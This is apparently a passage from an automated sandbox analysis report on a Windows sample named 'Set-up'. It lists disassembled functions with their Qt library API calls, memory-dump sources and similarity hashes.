?deref@QBasicAtomicInt@@QAE_NXZ.QTCORE4(?,00000000,6C185068), ref: 6C0F7DDF
?qFree@@YAXPAX@Z.QTCORE4(00000000,?,00000000,6C185068), ref: 6C0F7DEE

Memory Dump Source

Source File: 00000008.00000002.2090667779.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true

Associated: 00000008.00000002.2090640795.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2091694921.000000006C1AE000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092182184.000000006C3BF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092237383.000000006C3C8000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092357119.000000006C3CC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd

Similarity

API ID: AtomicBasicData@@GraphicsInt@@List$?begin@?deref@?items@Empty@Free@@Item@@@@List@Point@@@View@@
String ID:
API String ID: 545566851-0
Opcode ID: f4d321ded8011d8a9b55efa9be9637e8b4b4ede6b6c2db4c3705db494a76773b
Instruction ID: 25e986b5b05f1f7bf8f199e634e95892b947e2c07fb4bfb5d38444721aba0dee
Opcode Fuzzy Hash: f4d321ded8011d8a9b55efa9be9637e8b4b4ede6b6c2db4c3705db494a76773b
Instruction Fuzzy Hash: 4D216D76208341DFC700CF58D494B9ABBF8FF89B64F048A1DE89287691D731A549CBA2

Function 6BF9DB50 Relevance: 9.1, APIs: 6, Instructions: 57windowCOMMON

Download Yara Rule

APIs

??1QVariant@@QAE@XZ.QTCORE4(B6508C7A,?,?,?,?,6C18980B,000000FF,6BF9E6D0,?,?,?,?,00000000), ref: 6BF9DBB1
??1QIcon@@QAE@XZ.QTGUI4(?,?,6C18980B,000000FF,6BF9E6D0,?,?,?,?,00000000), ref: 6BF9DBBB
??1QString@@QAE@XZ.QTCORE4(?,?,6C18980B,000000FF,6BF9E6D0,?,?,?,?,00000000), ref: 6BF9DBC8
??1QString@@QAE@XZ.QTCORE4(?,?,6C18980B,000000FF,6BF9E6D0,?,?,?,?,00000000), ref: 6BF9DBD6
??1QString@@QAE@XZ.QTCORE4(?,?,6C18980B,000000FF,6BF9E6D0,?,?,?,?,00000000), ref: 6BF9DBE7
??3@YAXPAX@Z.MSVCR100(?,?,?,6C18980B,000000FF,6BF9E6D0,?,?,?,?,00000000), ref: 6BF9DBEE

Memory Dump Source

Source File: 00000008.00000002.2090667779.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true

Associated: 00000008.00000002.2090640795.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2091694921.000000006C1AE000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092182184.000000006C3BF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092237383.000000006C3C8000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092357119.000000006C3CC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd

Similarity

API ID: String@@$??3@Icon@@Variant@@
String ID:
API String ID: 3128302221-0
Opcode ID: 3786dfd831b29bc1b295694e6493795f8dae61ed3a46b19ea808d1a50bcecea2
Instruction ID: e3b3f530d9b7d323ef8af009e9168ef2ec7ca4b28776fdc9d9ee04048fc13bbb
Opcode Fuzzy Hash: 3786dfd831b29bc1b295694e6493795f8dae61ed3a46b19ea808d1a50bcecea2
Instruction Fuzzy Hash: 2F219A76108781CFE701DF58D444B5ABBE0FF95724F104A1DE896437A1D734A608CBE2

Function 6C08AC90 Relevance: 9.1, APIs: 6, Instructions: 54COMMON

Download Yara Rule

APIs

?begin@QListData@@QBEPAPAXXZ.QTCORE4(B6508C7A,?,-00000004,?,000000FF,?,6BCA006A,?), ref: 6C08ACC0
?detach@QListData@@QAEPAUData@1@H@Z.QTCORE4(?), ref: 6C08ACCE
?end@QListData@@QBEPAPAXXZ.QTCORE4(?,?,?,?,?,?,?,?,000000FF,6BC6F85C,00000000,?,6BC1226A), ref: 6C08ACE0
?begin@QListData@@QBEPAPAXXZ.QTCORE4(?,?,?,?,?,?,?,?,000000FF,6BC6F85C,00000000,?,6BC1226A), ref: 6C08ACEA

Part of subcall function 6BF74D10: memcpy.MSVCR100(00000000,00000000,?,6BC226D4,00000000,?,00000000), ref: 6BF74D30

?deref@QBasicAtomicInt@@QAE_NXZ.QTCORE4(00000000,00000000,00000000,?,?,?,?,?,?,?,?,000000FF,6BC6F85C,00000000,?,6BC1226A), ref: 6C08AD06
?qFree@@YAXPAX@Z.QTCORE4(?,?,?,?,?,?,?,?,?,000000FF,6BC6F85C,00000000,?,6BC1226A), ref: 6C08AD11

Memory Dump Source

Source File: 00000008.00000002.2090667779.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true

Associated: 00000008.00000002.2090640795.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2091694921.000000006C1AE000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092182184.000000006C3BF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092237383.000000006C3C8000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092357119.000000006C3CC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd

Similarity

API ID: Data@@List$?begin@$?deref@?detach@?end@AtomicBasicData@1@Free@@Int@@memcpy
String ID:
API String ID: 2846082872-0
Opcode ID: f30bcb7c3ccfc025d7f97e83dc5fbfdfb60f9015e58b12ffa662477e43900242
Instruction ID: f0d0c80d9049e711a03bf8f6a2f7c24282e884bc63d1dad266b7018f45ea8f6a
Opcode Fuzzy Hash: f30bcb7c3ccfc025d7f97e83dc5fbfdfb60f9015e58b12ffa662477e43900242
Instruction Fuzzy Hash: E7113071B04615AFCF00DF98E808A5EBBFCEF49A65F10462AF816D3780DB345A108BE5

Function 6C0DBD60 Relevance: 9.1, APIs: 6, Instructions: 54COMMON

Download Yara Rule

APIs

?items@QGraphicsScene@@QBE?AV?$QList@PAVQGraphicsItem@@@@ABVQPointF@@W4ItemSelectionMode@Qt@@W4SortOrder@5@ABVQTransform@@@Z.QTGUI4(?,?,00000001,00000001,B6508C7A,B6508C7A,?,00000000,6C1A6318,000000FF,6BC1351F,00000000,?,?,?), ref: 6C0DBD94
?isEmpty@QListData@@QBE_NXZ.QTCORE4(?,?,00000001,00000001,B6508C7A,B6508C7A,?,00000000,6C1A6318,000000FF,6BC1351F,00000000,?,?,?), ref: 6C0DBDA3
??9QBasicAtomicInt@@QBE_NH@Z.QTCORE4(00000001,?,00000000,6C1A6318,000000FF,6BC1351F,00000000,?,?,?), ref: 6C0DBDB3
?begin@QListData@@QBEPAPAXXZ.QTCORE4(?,00000000,6C1A6318,000000FF,6BC1351F,00000000,?,?,?), ref: 6C0DBDD2

Part of subcall function 6C08AC90: ?begin@QListData@@QBEPAPAXXZ.QTCORE4(B6508C7A,?,-00000004,?,000000FF,?,6BCA006A,?), ref: 6C08ACC0
Part of subcall function 6C08AC90: ?detach@QListData@@QAEPAUData@1@H@Z.QTCORE4(?), ref: 6C08ACCE
Part of subcall function 6C08AC90: ?end@QListData@@QBEPAPAXXZ.QTCORE4(?,?,?,?,?,?,?,?,000000FF,6BC6F85C,00000000,?,6BC1226A), ref: 6C08ACE0
Part of subcall function 6C08AC90: ?begin@QListData@@QBEPAPAXXZ.QTCORE4(?,?,?,?,?,?,?,?,000000FF,6BC6F85C,00000000,?,6BC1226A), ref: 6C08ACEA
Part of subcall function 6C08AC90: ?deref@QBasicAtomicInt@@QAE_NXZ.QTCORE4(00000000,00000000,00000000,?,?,?,?,?,?,?,?,000000FF,6BC6F85C,00000000,?,6BC1226A), ref: 6C08AD06
Part of subcall function 6C08AC90: ?qFree@@YAXPAX@Z.QTCORE4(?,?,?,?,?,?,?,?,?,000000FF,6BC6F85C,00000000,?,6BC1226A), ref: 6C08AD11

?deref@QBasicAtomicInt@@QAE_NXZ.QTCORE4(?,00000000), ref: 6C0DBDE6
?qFree@@YAXPAX@Z.QTCORE4(?,?,00000000), ref: 6C0DBDF5

Memory Dump Source

Source File: 00000008.00000002.2090667779.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true

Associated: 00000008.00000002.2090640795.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2091694921.000000006C1AE000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092182184.000000006C3BF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092237383.000000006C3C8000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092357119.000000006C3CC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd

Similarity

API ID: Data@@List$?begin@AtomicBasicInt@@$?deref@Free@@Graphics$?detach@?end@?items@Data@1@Empty@ItemItem@@@@List@Mode@Order@5@PointQt@@Scene@@SelectionSortTransform@@@
String ID:
API String ID: 200110531-0
Opcode ID: 4ed7ca15bf0fcf588101047ff39a2eaeeb89425dbb5e506aaa781e2341ce39fd
Instruction ID: d8c1fcd2ee08d3b0ecff0fad39fb55280f4c34e0ca10b0b0c4627e9ffcb17448
Opcode Fuzzy Hash: 4ed7ca15bf0fcf588101047ff39a2eaeeb89425dbb5e506aaa781e2341ce39fd
Instruction Fuzzy Hash: E5112E762083419FCB00CF54D854B9AB7F8FF89B14F048A1DF99697680D735E60ACB92

Function 6C0F0D30 Relevance: 9.1, APIs: 6, Instructions: 53COMMON

Download Yara Rule

APIs

?layoutDirection@QWidget@@QBE?AW4LayoutDirection@Qt@@XZ.QTGUI4(00000000,?,?,6C0F4257), ref: 6C0F0D51
?wizard@QWizardPage@@IBEPAVQWizard@@XZ.QTGUI4(00000000,?,?,6C0F4257), ref: 6C0F0D72
?orientation@QSplitterHandle@@QBE?AW4Orientation@Qt@@XZ.QTGUI4(00000000,?,?,6C0F4257), ref: 6C0F0D8A
?value@QAbstractSlider@@QBEHXZ.QTGUI4(00000000,?,?,6C0F4257), ref: 6C0F0DA2
?value@QAbstractSlider@@QBEHXZ.QTGUI4(00000000,?,?,6C0F4257), ref: 6C0F0DBC
?value@QAbstractSlider@@QBEHXZ.QTGUI4(00000000,?,?,6C0F4257), ref: 6C0F0DD4

Memory Dump Source

Source File: 00000008.00000002.2090667779.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true

Associated: 00000008.00000002.2090640795.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2091694921.000000006C1AE000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092182184.000000006C3BF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092237383.000000006C3C8000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092357119.000000006C3CC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd

Similarity

API ID: ?value@AbstractSlider@@$Direction@Qt@@$?layout?orientation@?wizard@Handle@@LayoutOrientation@Page@@SplitterWidget@@WizardWizard@@
String ID:
API String ID: 277282416-0
Opcode ID: 83801f1eac867df1db7f2ce2c332a1650414349ced8dd879ef170e45b985c7ef
Instruction ID: 2738bc44df3b27b8289c17362b9d07e49f335e28962394f5bad9e9a251f31038
Opcode Fuzzy Hash: 83801f1eac867df1db7f2ce2c332a1650414349ced8dd879ef170e45b985c7ef
Instruction Fuzzy Hash: D511E6B9406B028BC3A4EB74C5997D7B7E1BF85325F048D2ED0EE46260DF342845EB10

Function 6BD59070 Relevance: 9.1, APIs: 6, Instructions: 53COMMON

Download Yara Rule

APIs

?ref@QBasicAtomicInt@@QAE_NXZ.QTCORE4(B6508C7A,?,?,?,?,6C15EA9B,000000FF,6BD593D0,?,?,00000000,6C0C45B2,?,?,00000000), ref: 6BD590A1
?deref@QBasicAtomicInt@@QAE_NXZ.QTCORE4(?,00000000), ref: 6BD590A9
?deref@QBasicAtomicInt@@QAE_NXZ.QTCORE4 ref: 6BD590CC
?free@QVectorData@@SAXPAU1@H@Z.QTCORE4(?,00000008), ref: 6BD590DC
??1QBrush@@QAE@XZ.QTGUI4 ref: 6BD590F0
??3@YAXPAX@Z.MSVCR100(?), ref: 6BD590F6

Memory Dump Source

Source File: 00000008.00000002.2090667779.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true

Associated: 00000008.00000002.2090640795.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2091694921.000000006C1AE000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092182184.000000006C3BF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092237383.000000006C3C8000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092357119.000000006C3CC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd

Similarity

API ID: AtomicBasicInt@@$?deref@$??3@?free@?ref@Brush@@Data@@Vector
String ID:
API String ID: 1359379272-0
Opcode ID: 61ccea4988a47aa3414447029044af82766de7a0f738c803baa129598a554d8e
Instruction ID: 15ec4fb243d086325ddec0d1b2d0232cff6e5fdb0f37fd3e43d95bf695341304
Opcode Fuzzy Hash: 61ccea4988a47aa3414447029044af82766de7a0f738c803baa129598a554d8e
Instruction Fuzzy Hash: B91194B6604741CFDB10CF14D844B5AB7B8FF49B64F10092DE89697341DB39A618CBA2

Function 6C0DBCB0 Relevance: 9.0, APIs: 6, Instructions: 50COMMON

Download Yara Rule

APIs

?items@QGraphicsScene@@QBE?AV?$QList@PAVQGraphicsItem@@@@ABVQPointF@@@Z.QTGUI4(B6508C7A,?,B6508C7A,?,00000000,6C185068,000000FF,6BC134DA,00000000), ref: 6C0DBCDB

Part of subcall function 6C0D6890: ??0QTransform@@QAE@XZ.QTGUI4 ref: 6C0D68AA

?isEmpty@QListData@@QBE_NXZ.QTCORE4(B6508C7A,?,B6508C7A,?,00000000,6C185068,000000FF,6BC134DA,00000000), ref: 6C0DBCEA
??9QBasicAtomicInt@@QBE_NH@Z.QTCORE4(00000001,?,00000000,6C185068,000000FF,6BC134DA,00000000), ref: 6C0DBCFA
?begin@QListData@@QBEPAPAXXZ.QTCORE4(?,00000000,6C185068,000000FF,6BC134DA,00000000), ref: 6C0DBD19

Part of subcall function 6C08AC90: ?begin@QListData@@QBEPAPAXXZ.QTCORE4(B6508C7A,?,-00000004,?,000000FF,?,6BCA006A,?), ref: 6C08ACC0
Part of subcall function 6C08AC90: ?detach@QListData@@QAEPAUData@1@H@Z.QTCORE4(?), ref: 6C08ACCE
Part of subcall function 6C08AC90: ?end@QListData@@QBEPAPAXXZ.QTCORE4(?,?,?,?,?,?,?,?,000000FF,6BC6F85C,00000000,?,6BC1226A), ref: 6C08ACE0
Part of subcall function 6C08AC90: ?begin@QListData@@QBEPAPAXXZ.QTCORE4(?,?,?,?,?,?,?,?,000000FF,6BC6F85C,00000000,?,6BC1226A), ref: 6C08ACEA
Part of subcall function 6C08AC90: ?deref@QBasicAtomicInt@@QAE_NXZ.QTCORE4(00000000,00000000,00000000,?,?,?,?,?,?,?,?,000000FF,6BC6F85C,00000000,?,6BC1226A), ref: 6C08AD06
Part of subcall function 6C08AC90: ?qFree@@YAXPAX@Z.QTCORE4(?,?,?,?,?,?,?,?,?,000000FF,6BC6F85C,00000000,?,6BC1226A), ref: 6C08AD11

?deref@QBasicAtomicInt@@QAE_NXZ.QTCORE4(?,00000000), ref: 6C0DBD2D
?qFree@@YAXPAX@Z.QTCORE4(?,?,00000000), ref: 6C0DBD3C

Memory Dump Source

Source File: 00000008.00000002.2090667779.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true

Associated: 00000008.00000002.2090640795.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2091694921.000000006C1AE000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092182184.000000006C3BF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092237383.000000006C3C8000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092357119.000000006C3CC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd

Similarity

API ID: Data@@List$?begin@AtomicBasicInt@@$?deref@Free@@Graphics$?detach@?end@?items@Data@1@Empty@F@@@Item@@@@List@PointScene@@Transform@@
String ID:
API String ID: 2882387941-0
Opcode ID: b02e14c52440916595d4bfa08c85e7cf034bb354667f63c12133790d79a5f84e
Instruction ID: fee783c4b1c12e06bae4cd3837e4ba1c3b21c2b8c84611e0eb3d16b43401ffcf
Opcode Fuzzy Hash: b02e14c52440916595d4bfa08c85e7cf034bb354667f63c12133790d79a5f84e
Instruction Fuzzy Hash: 92114C762083419FCB00CF54D844B9ABBF8FF99B64F004A1DF49287691DB34A649CBA2

Function 6C0F2A90 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

?map@QTransform@@QBE?AVQPointF@@ABV2@@Z.QTGUI4(?,?,?), ref: 6C0F2AB1

Part of subcall function 6BD7FC10: ?x@QPointF@@QBENXZ.QTCORE4(?,?,?,?,?,?,?,?,?,?,?,?,?,6C0C38AF,?), ref: 6BD7FC22
Part of subcall function 6BD7FC10: ?y@QPointF@@QBENXZ.QTCORE4(?,?,?,?,?,?,?,?,?,?,?,6C0C38AF,?), ref: 6BD7FC2E

?unicode@QChar@@QAEAAGXZ.QTCORE4(?), ref: 6C0F2AD5
?updateScroll@QGraphicsViewPrivate@@QAEXXZ.QTGUI4 ref: 6C0F2AE8
?ry@QPointF@@QAEAANXZ.QTCORE4 ref: 6C0F2AFB
?updateScroll@QGraphicsViewPrivate@@QAEXXZ.QTGUI4 ref: 6C0F2B0E
?toPoint@QPointF@@QBE?AVQPoint@@XZ.QTCORE4(?), ref: 6C0F2B26

Memory Dump Source

Source File: 00000008.00000002.2090667779.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true

Associated: 00000008.00000002.2090640795.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2091694921.000000006C1AE000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092182184.000000006C3BF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092237383.000000006C3C8000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092357119.000000006C3CC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd

Similarity

API ID: Point$?updateGraphicsPrivate@@Scroll@View$?map@?ry@?unicode@Char@@Point@Point@@Transform@@V2@@
String ID:
API String ID: 3625280498-0
Opcode ID: 4916538acb4f54a97476d59491307c84cbdf41561e5d29fd60f61c9847ef8b3a
Instruction ID: 7e35fd6a4215a1ef358802e52f1fb9af2747ec3633c61c8c8a35c6527044e06a
Opcode Fuzzy Hash: 4916538acb4f54a97476d59491307c84cbdf41561e5d29fd60f61c9847ef8b3a
Instruction Fuzzy Hash: C41190302047418FD714CF20D098B9BBBE4FF89318F25C85CE8EA43250DB30A95ACB82

Function 6BE6AD90 Relevance: 9.0, APIs: 6, Instructions: 45windowCOMMON

Download Yara Rule

APIs

?layoutDirection@QApplication@@SA?AW4LayoutDirection@Qt@@XZ.QTGUI4(B6508C7A,?,?,?,6C55BB20,?), ref: 6BE6ADCD
??0QRect@@QAE@XZ.QTCORE4(B6508C7A,?,?,?,6C55BB20,?), ref: 6BE6ADD8
??0QFont@@QAE@XZ.QTGUI4(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,6C183048), ref: 6BE6ADE2
??0QVolatileImage@@QAE@ABV0@@Z.QTGUI4(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6BE6ADEF

Part of subcall function 6BDDC640: ?ref@QBasicAtomicInt@@QAE_NXZ.QTCORE4(?,6BE6A909), ref: 6BDDC64F

??1QFontMetricsF@@QAE@XZ.QTGUI4 ref: 6BE6ADFD

Part of subcall function 6BDCA8C0: ?deref@QBasicAtomicInt@@QAE_NXZ.QTCORE4(?,6BE6A917), ref: 6BDCA8C9
Part of subcall function 6BDCA8C0: ??1QFontPrivate@@QAE@XZ.QTGUI4 ref: 6BDCA8DB
Part of subcall function 6BDCA8C0: ??3@YAXPAX@Z.MSVCR100(?), ref: 6BDCA8E1

??0QPalette@@QAE@XZ.QTGUI4 ref: 6BE6AE05

Memory Dump Source

Source File: 00000008.00000002.2090667779.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true

Associated: 00000008.00000002.2090640795.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2091694921.000000006C1AE000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092182184.000000006C3BF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092237383.000000006C3C8000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092357119.000000006C3CC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd

Similarity

API ID: AtomicBasicDirection@FontInt@@$??3@?deref@?layout?ref@Application@@Font@@Image@@LayoutMetricsPalette@@Private@@Qt@@Rect@@V0@@Volatile
String ID:
API String ID: 1631850604-0
Opcode ID: 675537ad4044a2fde6c956059f15d15fd654e30b3dcf96a06d7064efda1934d0
Instruction ID: 7b08fb87686a3c6980abad046597a21ce06c148cfcd5073014209e2f8fd69ee7
Opcode Fuzzy Hash: 675537ad4044a2fde6c956059f15d15fd654e30b3dcf96a06d7064efda1934d0
Instruction Fuzzy Hash: BC11FEB19187418FC324DF29C54565BFBE8FF94624F404A1EE49683A50EB78A104CFA2

Function 6C0ED070 Relevance: 9.0, APIs: 6, Instructions: 40COMMON

Download Yara Rule

APIs

??0QPointF@@QAE@XZ.QTCORE4(B6508C7A,00000000,?,00000000,00000000,6C1A76A8,000000FF,6C0ED584), ref: 6C0ED0AE
??0QPointF@@QAE@XZ.QTCORE4(?,00000000,00000000,6C1A76A8,000000FF,6C0ED584), ref: 6C0ED0B7
??0QPoint@@QAE@XZ.QTCORE4(?,00000000,00000000,6C1A76A8,000000FF,6C0ED584), ref: 6C0ED0C0
??0QPointF@@QAE@XZ.QTCORE4(?,00000000,00000000,6C1A76A8,000000FF,6C0ED584), ref: 6C0ED0C9
??0QPointF@@QAE@XZ.QTCORE4(?,00000000,00000000,6C1A76A8,000000FF,6C0ED584), ref: 6C0ED0D2
??0QPoint@@QAE@XZ.QTCORE4(?,00000000,00000000,6C1A76A8,000000FF,6C0ED584), ref: 6C0ED0DB

Memory Dump Source

Source File: 00000008.00000002.2090667779.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true

Associated: 00000008.00000002.2090640795.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2091694921.000000006C1AE000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092182184.000000006C3BF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092237383.000000006C3C8000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092357119.000000006C3CC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd

Similarity

API ID: Point$Point@@
String ID:
API String ID: 672001964-0
Opcode ID: cf80d8aeb391eae1dcee251ff8d0ad58380e1ae5e35101e64ebcd35ffc4c93e1
Instruction ID: db860d09c9719d123b6061e77fabe62db730e19914ce9e99752a03d54a61a9ba
Opcode Fuzzy Hash: cf80d8aeb391eae1dcee251ff8d0ad58380e1ae5e35101e64ebcd35ffc4c93e1
Instruction Fuzzy Hash: 65012971204B52DFC728DF6AD958A5AFBF4FF95710F00891EE09782B60DB70A605CB91

Function 6BF9DA20 Relevance: 7.6, APIs: 5, Instructions: 93windowCOMMON

Download Yara Rule

APIs

??0QString@@QAE@ABV0@@Z.QTCORE4(?,B6508C7A,00000000,?,00000000,00000000,6C18969F,000000FF,6BF9E0AA,?), ref: 6BF9DA5E
??0QString@@QAE@ABV0@@Z.QTCORE4(?,?,?), ref: 6BF9DA73
??0QString@@QAE@ABV0@@Z.QTCORE4(?,?,?,?), ref: 6BF9DA85
??0QIcon@@QAE@ABV0@@Z.QTGUI4(?,?,?,?), ref: 6BF9DA97

Part of subcall function 6BCA13D0: ?ref@QBasicAtomicInt@@QAE_NXZ.QTCORE4(?,6BF9D44C,?), ref: 6BCA13E2

??0QVariant@@QAE@ABV0@@Z.QTCORE4(?,?,?,?,?), ref: 6BF9DB0A

Memory Dump Source

Source File: 00000008.00000002.2090667779.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true

Associated: 00000008.00000002.2090640795.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2091694921.000000006C1AE000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092182184.000000006C3BF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092237383.000000006C3C8000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092357119.000000006C3CC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd

Similarity

API ID: V0@@$String@@$?ref@AtomicBasicIcon@@Int@@Variant@@
String ID:
API String ID: 197830607-0
Opcode ID: 89e92fe7772806bc81267a6ea2f46c74be7d50cbf8e6e7dc7c468abb26687bec
Instruction ID: 106c8bc148e96edf58371d5ca79fe6e42e5d83509430535efa690ece93bd7dd4
Opcode Fuzzy Hash: 89e92fe7772806bc81267a6ea2f46c74be7d50cbf8e6e7dc7c468abb26687bec
Instruction Fuzzy Hash: 4A418FB9604B42AFC329CF2AC184956FBF5BF48614B008A1EE89A83B50D770F565CF91

Function 6BCA2B00 Relevance: 7.6, APIs: 5, Instructions: 76windowCOMMON

Download Yara Rule

APIs

?isNull@QPixmap@@QBE_NXZ.QTGUI4(B6508C7A,?,?,?,?,6C1541CE,000000FF,6BCA3537,?,00000000,00000001,?,6BC124C1,?,B6508C7A), ref: 6BCA2B2B
??2@YAPAXI@Z.MSVCR100(00000018,B6508C7A,?,?,?,?,6C1541CE,000000FF,6BCA3537,?,00000000,00000001,?,6BC124C1,?,B6508C7A), ref: 6BCA2B43
??2@YAPAXI@Z.MSVCR100(00000008,?,?,?,?,?,?,?,000000FF), ref: 6BCA2B72
?ref@QBasicAtomicInt@@QAE_NXZ.QTCORE4(?,?,?,?,?,?,?,?,000000FF), ref: 6BCA2BA1

Part of subcall function 6BCA1300: ??0QLatin1String@@QAE@PBD@Z.QTCORE4(00000001,?,6BCA179F,?,?,?,?,?,?,?,000000FF), ref: 6BCA130E
Part of subcall function 6BCA1300: ?fetchAndAddRelaxed@QBasicAtomicInt@@QAEHH@Z.QTCORE4(00000001,?,?,?,?,?,?,?,000000FF), ref: 6BCA131B

?detach@QIcon@@QAEXXZ.QTGUI4(B6508C7A,?,?,?,?,6C1541CE,000000FF,6BCA3537,?,00000000,00000001,?,6BC124C1,?,B6508C7A), ref: 6BCA2BC7

Memory Dump Source

Source File: 00000008.00000002.2090667779.000000006BC11000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BC10000, based on PE: true

Associated: 00000008.00000002.2090640795.000000006BC10000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2091694921.000000006C1AE000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092182184.000000006C3BF000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092237383.000000006C3C8000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000008.00000002.2092357119.000000006C3CC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6bc10000_Set-up.jbxd

Similarity

API ID: ??2@AtomicBasicInt@@$?detach@?fetch?ref@Icon@@Latin1Null@Pixmap@@Relaxed@String@@
String ID:
API String ID: 2619993550-0
Opcode ID: fe2ffc1e875153ed42362cf840f71d0bae7eaa7535d80b0e2a0afa066178335b
